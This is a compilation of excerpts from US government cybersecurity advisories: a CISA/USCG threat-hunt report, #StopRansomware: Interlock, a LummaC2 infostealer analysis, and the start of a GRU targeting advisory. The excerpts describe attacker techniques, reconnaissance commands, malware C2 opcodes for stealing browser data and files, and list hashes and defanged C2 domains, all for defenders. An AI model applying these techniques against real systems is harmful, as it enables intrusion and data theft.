CISA and USCG Identify Areas for Cyber Hygiene Improvement After Conducting Proactive Threat Hunt at US Critical Infrastructure Organization

Tue, 29 Jul 2025 17:53:52 +0000

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard (USCG) are issuing this Cybersecurity Advisory to present findings from a recent CISA and USCG hunt engagement. The purpose of this advisory is to highlight identified cybersecurity issues, thereby informing security defenders in other organizations of potential similar issues and encouraging them to take proactive measures to enhance their cybersecurity posture. This advisory has been coordinated with the organization involved in the hunt engagement.

In 2024, CISA led a proactive hunt engagement at a U.S. critical infrastructure organization with the support of USCG analysts. During hunts, CISA proactively searches for evidence of malicious activity or malicious cyber actor presence on customer networks. The organization invited CISA to conduct a proactive hunt to determine if an actor had been present in the organization’s environment. (Note: Henceforth, unless otherwise defined, “CISA” is used in this advisory to refer to the hunt team as an umbrella for both CISA and USCG analysts).

During this engagement, CISA did not identify evidence of malicious cyber activity or actor presence on the organization’s network, but did identify cybersecurity risks, including:

Insufficient logging;
Insecurely stored credentials;
Shared local administrator (admin) credentials across many workstations;
Unrestricted remote access for local admin accounts;
Insufficient network segmentation configuration between IT and operational technology (OT) assets; and
Several device misconfigurations.

In coordination with the organization where the hunt was conducted, CISA and USCG are sharing cybersecurity risk findings and associated mitigations to assist other critical infrastructure organizations with improving their cybersecurity posture. Recommendations are listed for each of CISA’s findings, as well as general practices to strengthen cybersecurity for OT environments. These mitigations align with CISA and the National Institute for Standards and Technology’s (NIST) Cross-Sector Cybersecurity Performance Goals (CPGs), and with mitigations provided in the USCG Cyber Command’s (CGCYBER) 2024 Cyber Trends and Insights in the Marine Environment (CTIME) Report.

Although no malicious activity was identified during this engagement, critical infrastructure organizations are advised to review and implement the mitigations listed in this advisory to prevent potential compromises and better protect our national infrastructure. These mitigations include the following (listed in order of importance):

Do not store passwords or credentials in plaintext. Instead, use secure password and credential management solutions such as encrypted password vaults, managed service accounts, or built-in secure features of deployment tools.
- Ensure that all credentials are encrypted both at rest and in transit. Implement strict access controls and regular audits to securely manage scripts or tools accessing credentials.
- Use code reviews and automated scanning tools to detect and eliminate any instances of plaintext credentials on hosts or workstations.
- Enforce the principle of least privilege, only granting users and processes the access necessary to perform their functions.
Avoid sharing local administrator account credentials. Instead, provision unique, complex passwords for each account using tools like Microsoft’s Local Administrator Password Solution (LAPS) that automate password management and rotation.
Enforce multifactor authentication (MFA) for all administrative access, including local and domain accounts, and for remote access methods such as Remote Desktop Protocol (RDP) and virtual private network (VPN) connections.
Implement and enforce strict policies to only use hardened bastion hosts isolated from IT networks equipped with phishing-resistant MFA to access industrial control systems (ICS)/OT networks, and ensure regular workstations (i.e., workstations used for accessing IT networks and applications) cannot be used to access ICS/OT networks.
Implement comprehensive (i.e., large coverage) and detailed logging across all systems, including workstations, servers, network devices, and security appliances.
- Ensure logs capture information such as authentication attempts, command-line executions with arguments, and network connections.
- Retain logs for an appropriate period to enable thorough historical analysis (adhering to organizational policies and compliance requirements) and aggregate logs in an out-of-band, centralized location, such as a security information event management (SIEM) tool, to protect them from tampering and facilitate efficient analysis.

For more detailed mitigations addressing the identified cybersecurity risks, see the Mitigations section of this advisory.

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 17. See Appendix: MITRE ATT&CK Tactics and Techniques for a table of potential activity mapped to MITRE ATT&CK tactics and techniques.

Overview

Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard (USCG) analysts (collectively referred to as CISA in this report) conducted a threat hunt engagement at a critical infrastructure organization in 2024. During this hunt, CISA proactively searched for evidence of malicious activity or the presence of a malicious cyber actor on the customer’s network using host, network, industrial control system (ICS), and commercial cloud and open-source analysis tools. CISA searched for evidence of activity by looking for specific exploitation tactics, techniques, and procedures (TTPs) and associated artifacts.

While CISA did not find evidence of threat actor presence on the organization’s network, the team did identify several cybersecurity risks. These findings are listed below in order of risk. Technical details of each identified cyber risk are included, along with the potential impact from threat actor exploitation of each risk (recommendations for mitigating each risk are listed in the Mitigations section below).

Several of these findings align with those observed during similar engagements conducted by US Coast Guard Cyber Command (CGCYBER), which are documented in their 2024 Cyber Trends and Insights in the Marine Environment (CTIME) report. The authoring agencies encourage critical infrastructure organizations to review the CTIME report to understand trends in the techniques/attack paths threat actors are using to compromise at-risk organizations, and what mitigations organizations should implement to prevent a successful attack.

Key Findings

Shared Local Admin Accounts with Non-Unique Passwords Stored as Plaintext

Details: CISA identified a few local admin accounts with non-unique passwords; these accounts were shared across many hosts. The credentials for each account were stored plaintext in batch scripts. CISA discovered these authorized scripts were configured to create user accounts with local admin privileges and then set identical, non-expiring passwords—these passwords were stored in plaintext in the script. One script was configured to create an admin account (set with a password stored in the script in plaintext) and automatically add to the admin group. The account was set as the local admin account on many other hosts.

Potential Impact: The storage of local admin credentials in plaintext scripts across numerous hosts increases the risk of widespread unauthorized access, and the usage of non-unique passwords facilitates lateral movement throughout the network. Malicious actors with access to workstations with either of these batch scripts could obtain the passwords for these local admin accounts by searching the filesystem for strings like net user /add, identifying scripts containing usernames and passwords [T1552.001], and accessing these accounts to move laterally.

For example, during a controlled security validation exercise (with explicit permission from the customer), CISA used the credentials found in one of the scripts to log into its associated admin account locally on a workstation [T1078.003], and then establish a Remote Desktop Protocol (RDP) connection to another workstation [T1021.001]. This demonstrated that the credentials allowed local login to an admin account and enabled lateral movement to any workstation with the account. While using this account, the user had local admin privileges on many workstations. Upon initiating the RDP session, the system issued out a notification that another user was currently logged in and that continuing the session would disconnect the existing user, confirming that the account can be accessed remotely via RDP.

The uniform use of local admin accounts with identical, non-expiring passwords across numerous hosts, coupled with the storage of these credentials in plaintext within accessible scripts, elevates the risk of unauthorized access and lateral movement throughout the network.

With local admin access, malicious cyber actors can:

Modify existing accounts or create new accounts [T1098], potentially escalating privileges or maintaining persistent access.
Install malicious browser extensions on compromised systems [T1112].
Communicate with compromised systems using standard application layer protocols [T1071], which may bypass certain security monitoring tools.
Modify local policies to escalate privileges or disable security features [T1484].
Alter system configurations or install software that executes at startup [T1547], ensuring continued access and persistence.
Hijack the execution flow of applications to inject malicious code [T1574].

The widespread distribution of plaintext credentials and the use of identical passwords across hosts increases the risk of unauthorized access throughout the network. This vulnerability heightens the potential for attackers to conduct unauthorized activities, which may impact the confidentiality, integrity, and availability of the organization’s assets.

Note: This finding was associated with workstations only; servers and other devices were not affected.

Insufficient Network Segmentation Configuration Between IT and Operational Technology Environments

Details: While assessing interconnectivity between the customer’s IT and operational technology (OT) environments, CISA identified that the OT environment was not properly configured. Specifically, standard user accounts could directly access the supervisory control and data acquisition (SCADA) virtual local area network (VLAN) directly from IT hosts.

First, CISA determined it was possible to establish a connection via port 21 from a user workstation in the IT network to a system within the SCADA VLAN. The test established that a network path was available, the remote host was reachable, the port was open and listening for connections, and that the port was directly accessible between the IT and SCADA VLANs, with misconfigured network-level restrictions—for example, firewalls or access control lists (ACLs)—blocking the Transmission Control Protocol (TCP) connection on the port. This test was conducted using a standard user account on a regular IT workstation without administrative privileges [T1078].

Second, CISA discovered that the customer did not have sufficient secured bastion hosts dedicated for accessing SCADA and heating, ventilation, and air conditioning (HVAC) systems. A bastion host—sometimes referred to as a jump box or jump server—is a specialized, highly secured system (often a server or dedicated workstation) that serves as the sole access point between a network segment (such as an internal IT network) and a protected internal network (like an OT or ICS environment). By inspecting and filtering all inbound and outbound traffic, a bastion host is designed to prevent unauthorized access and lateral movement, ensuring that only authenticated and authorized users can interact with internal systems. Though several hosts were designated as bastion hosts for remote access to SCADA and HVAC systems, they lacked the enhanced security configuration, dedicated monitoring, and specialized scrutiny expected of bastion hosts.

Potential Impact: Insufficient OT network segmentation configuration, network access control (NAC), and the ability of a non-privileged user within the IT network to use their credentials to access the critical SCADA VLAN [T1078] presents a security and safety risk. Given that SCADA and HVAC systems control physical processes, compromises of these systems can have real-world consequences, including risks to personnel safety, infrastructure integrity, and equipment functionality.

Malicious actors could further exploit potentially unsecured workstations with access to OT systems, and insufficient network segmentation configuration between IT and OT systems, in the following ways:

Use RDP or Secure Shell (SSH) protocols to move laterally from compromised IT workstations to OT systems [T1021.001] [T1021.004].
Execute commands and scripts using scripting languages like PowerShell to attack OT systems [T1059].
Map network connections to identify paths to OT systems [T1049].
Gather information about network configurations to plan attacks on OT systems [T1016].

By exploiting these weaknesses, attackers can potentially gain unauthorized access to critical OT systems, manipulate physical processes, disrupt operations, and cause harm.

Insufficient Log Retention and Implementation

Details: CISA was unable to hunt for every MITRE ATT&CK^® procedure in the scoped hunt plan partly because the organization’s event logging system was insufficient for this analysis. For example, Windows event logs from workstations were not being forwarded to the organization’s security information event management (SIEM), verbose command line auditing was not enabled (meaning command line arguments were not being captured in Event ID 4688), logging in the SIEM was not as comprehensive as required for the analysis, and log retention did not allow for a thorough analysis of historical activity.

Potential Impact: The absence of comprehensive and detailed logs, along with a lack of an established baseline for normal network behavior, prevented CISA from performing thorough behavior and anomaly-based detection. This limitation hindered the ability to hunt for certain TTPs, such as living-off-the-land techniques, the use of valid accounts [T1078], and other TTPs used by sophisticated threat actors. Such techniques often do not produce discrete indicators of compromise or trigger alerts from antivirus software, intrusion detection systems (IDS), or endpoint detection and response (EDR) solutions. Further, the lack of workstation logs in the organization’s SIEM meant CISA could not analyze authentication events to identify anomalous activities, such as unauthorized access using local administrator credentials. This gap exposes networks to undetected lateral movement and unauthorized access.

Insufficient logging can prevent the detection of malicious activity by hindering investigations, which makes detection of threat actors more challenging and leaves the network susceptible to undetected threats.

Additional Findings

Misconfigured sslFlags on a Production Server

Details: CISA used PowerShell to examine the ApplicationHost.config file^[¹^]—a central configuration file for Internet Information Services (IIS) that governs the behavior of the web server and its applications and websites—on a production IIS server. CISA observed an HTTPS binding configured with sslFlags==“0”, which keeps IIS in its legacy “one-certificate-per-IP” mode. This mode disables modern certificate-management features, and because mutual Transport Layer Security (TLS) (client-certificate authentication) must be enabled separately in “SSL Settings” or by adding <access sslFlags=“Ssl, SslRequireCert” />, the binding leaves the client-certificate enforcement off by default, allowing any TLS client to complete the handshake anonymously. Moreover, sslFlags does not control protocol or cipher selection, so outdated protocols or weak cipher suites (e.g., SSL 3.0, TLS 1.0/1.1) may still be accepted unless Secure Channel (Schannel)^[²^] has been explicitly hardened.

Potential Impact: The misconfigured sslFlags could enable threat actors to attempt an adversary-in-the-middle attack [T1557] to intercept credentials and data transmitted between clients and the IIS server. Malicious actors could also exploit vulnerabilities in older Secure Sockets Layer (SSL)/TLS protocols, as well as weak cipher suites, increasing the risk for protocol downgrade attacks in which an attacker forces the server and client to negotiate the use of weaker encryption standards [T1562.010]. This compromises the confidentiality and integrity of data transmitted over this channel. Furthermore, the absence of client certificate enforcement meant the server did not validate the identity of the connecting clients beyond the basic SSL/TLS handshake. This deficiency exposed the server to risks where unauthorized or malicious clients could impersonate legitimate users, potentially gaining access to sensitive resources without proper verification.

Misconfigured Structured Query Language Connections on a Production Server

#StopRansomware: Interlock

Mon, 21 Jul 2025 14:11:24 +0000

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)—hereafter referred to as “the authoring organizations”—are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third-party reporting.

The Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.

Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.

FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables mapped to the threat actors’ activity.

Overview

Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services.

Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a `.onion` URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.

The authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.¹ For additional information on Rhysida ransomware, see the joint advisory, #StopRansomware: Rhy sida Ransomware .

Initial Access

FBI has observed Interlock actors obtaining initial access [TA0001] via drive-by download [T1189] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).²

In some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [T1189]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [T1204.004].³

Note: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.⁴

Execution and Persistence

Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [T1105] designed to execute a PowerShell script [T1059.001] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [T1547.001], establishing persistence [TA0003].

FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [T1547.001]. To do so, Interlock actors used a PowerShell command [T1059.001] designed to add a run key value named “Chrome Updater” [T1036.005] that uses a specific log file as an argument upon user login.

Reconnaissance

To facilitate reconnaissance, a PowerShell script executes a series of commands [T1059.001] designed to gather information on victim machines (see Table 1).

Table 1. PowerShell Commands for Reconnaissance

PowerShell Command Description

WindowsIdentity.GetCurrent() Returns a WindowsIdentity object that represents the current Windows user [T1033].

systeminfo Displays detailed configuration information [T1082] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.

tasklist/svc Lists unabridged service information [T1007] for each process currently running on the local computer.

Get-Service Gets objects that represent the services [T1007] on a computer, including running and stopped services.

Get-PSDrive
Gets the drives [T1082] in the current session, such as:

Windows logical drives on the computer, including drives mapped to network shares.

Drives exposed by PowerShell providers.

Session-specified temporary drives and persistent mapped network drives.

arp -a Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [T1016], which contains entries on the IPv4 and IPv6 addresses on host endpoints.

Command and Control

FBI observed Interlock actors using command and control (C2) [TA0011] applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT⁵ and NodeSnake RAT (as of March 2025)⁶ for C2 and executing commands.

Credential Access, Lateral Movement, and Privilege Escalation

FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (`cht.exe`) [TA0006] and keylogger binary (`klg.dll`) [T1056.001],[T1105]. According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts [T1555.003], while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named `conhost.txt` [T1036.005].⁷ As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [TA0006], including Lumma Stealer⁸ and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [T1078].⁹

Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)¹⁰ [T1021.001] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [T1219].¹¹ In addition to stealing users’ online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [T1558.003])¹² to gain additional privileges [T1078.002].

Collection and Exfiltration

Interlock actors leverage Azure Storage Explorer (`StorageExplorer.exe`) to navigate victims’ Microsoft Azure Storage accounts [T1530] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [T1567.002].¹³ Interlock actors also exfiltrate data over file transfer tools, including WinSCP [T1048].

Impact

Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named `conhost.exe` [T1486],[T1036.005]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [T1486], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.¹⁴

A cybersecurity company identified a DLL binary named `tmp41.wasd`—executed after encryption using `rundll32.exe` [T1218.011]—which uses the `remove()` function to delete the encryption binary [T1070.004];¹⁵ on Linux machines, the encryptor uses a similar technique to execute the `removeme` function.

Encrypted files are appended with either `a .interlock` or `.1nt3rlock` file extension, alongside a ransom note titled `!README!.txt` delivered via group policy object (GPO). Interlock actors use a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a `.onion` URL.

Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.¹⁶

Leveraged Tools

See Table 2 for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 2. Tools Used by Interlock Ransomware Actors

Tool Name Description

AnyDesk A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.

Cobalt Strike A penetration testing tool used by security professionals to test the security of networks and systems.

PowerShell A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.

PSExec A tool designed to run programs and execute commands on remote systems.

PuTTY.exe An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).

ScreenConnect A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).

SystemBC Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.

Windows Console Host Windows Console Host (`conhost.exe`) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.

WinSCP A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client.

Leveraged Files

See Table 3 and Table 4 for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.

Disclaimer: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking.

Table 3. Files Used by Interlock Ransomware Actors (SHA-256)

File Name Hash

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Tue, 20 May 2025 19:20:23 +0000

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

Download the PDF version of this report:

AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations (PDF, 1.28 MB )

For a downloadable copy of IOCs, see:

AA25-141B STIX XML (XML, 146.54 KB )

AA25-141B STIX JSON (JSON, 300.90 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

Overview

LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.

To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027].

Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

File Execution

Upon execution, the `LummaC2.exe` file will enter its main routine, which includes four sub-routines (see Figure 1).

Figure 1. LummaC2 Main Routine

The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

Figure 2. Message Box

If the user selects `No`, the malware will exit. If the user selects `Yes`, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.

After each domain is decoded, the implant will attempt a `POST` request [T1071.001] (see Figure 3).

Figure 3. `Post` Request

If the `POST` request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4).

Figure 4. Code Saving Successful Callback Request

Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) `GetUserNameW` and `GetComputerNameW` respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

Figure 5. User and Computer Name Check

The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.

If the username hash is equal to the value `0x56CF7626`, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of `0xB09406C7`. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.

If the username and hostname check function returns `zero` (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following `POST` request (see Figure 6).

Figure 6. Second `POST` Request

The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the `ex` key, which contains an array of objects (see Figure 7).

Figure 7. Parsing of `ex` JSON Value

Parsing the `c` key contains an array of objects, which will give the implant its C2 (see Figure 8).

Figure 8. Parsing of `c` JSON Value

C2 Instructions

Each array object that contains the JSON key value of `t` will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.

1. Opcode `0` – Steal Data Generic

This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode `O` command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1).

Table 2. Opcode `1` Options

Key Value

p Path to steal from

m File extensions to read

z Output directory to store stolen data

d Depth of recursiveness

fs Maximum file size

2. Opcode `1` – Steal Browser Data

This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2).

Table 2. Opcode `1` Options

Key Value

p Path to steal from

z Name of Browser – Output

3. Opcode `2` – Steal Browser Data (Mozilla)

This command is identical to Opcode `1`; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).

Table 3. Opcode `2` Options

Key Value

p Path to steal from

z Name of Browser – Output

4. Opcode `3` – Download a File

This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with `u` to download and create the extension specified in the `ft` key [T1105] (see Table 4).

Table 4. Opcode `3` Options

Key Value

u URL for Download

ft File Extension

e Execution Type

The `e` value can take two values: `0` or `1`. This specifies how to execute the downloaded file either with the `LoadLibrary` API or via the command line with `rundll32.exe` [T1106] (see Table 5).

Table 5. Execution Types

Key Value

e=0 Execute with `LoadLibraryW()`

e=1 Executive with `rund1132.exe`

5. Take Screenshot

If the configuration JSON file has a key of “`se`” and its value is “`true`,” the malware will take a screenshot in BMP format and upload it to the C2 server.

6. Delete Self

If the configuration JSON file has a key of “`ad`” and its value is “`true`,” the malware will enter a routine to delete itself.

The command shown in Figure 9 will be decoded and executed for self-deletion.

Figure 9. Self-Deletion Command Line

Figure 10 depicts the above command line during execution.

Figure 10. Decoded Command Line in Memory

Host Modifications

Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.

Decrypted Strings

Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

Figure 11. Decoded Strings

Indicators of Compromise

See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.

Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

Table 6. LummaC2 Executable Hashes

Executables Type

4AFDC05708B8B39C82E60ABE3ACE55DB (`LummaC2.exe` from November 2023) MD5

E05DF8EE759E2C955ACC8D8A47A08F42 (`LummaC2.exe` from November 2023) MD5

C7610AE28655D6C1BCE88B5D09624FEF MD5

1239288A5876C09D9F0A67BCFD645735168A7C80 (`LummaC2.exe` from November 2023) SHA1

B66DA4280C6D72ADCC68330F6BD793DF56A853CB (`LummaC2.exe` from November 2023) SHA1

3B267FA5E1D1B18411C22E97B367258986E871E5 TLSH

19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023) SHA256

2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (`LummaC2.exe` from November 2023) SHA256

4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D SHA256

325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a SHA256

76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c SHA256

7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70 SHA256

a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab SHA256

b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959 SHA256

ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b SHA256

Table 7. LummaC2 DLL Binaries

DLL Binaries Type

iphlpapi.dll IP Helper API

winhttp.dll Windows HTTP Services

The following are domains observed deploying LummaC2 malware.

Disclaimer: The domains below are historical in nature and may not currently be malicious.

Pinkipinevazzey[.]pw

Fragnantbui[.]shop

Medicin

Russian GRU Targeting Western Logistics Entities and Technology Companies

Mon, 12 May 2025 16:49:12 +0000

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

The following authors and co-sealers are releasing this CSA:

United States National Security Agency (NSA)

United States Federal Bureau of Investigation (FBI)

United Kingdom National Cyber Security Centre (NCSC-UK)

Germany Federal Intelligence Service (BND) Bundesnachrichtendienst

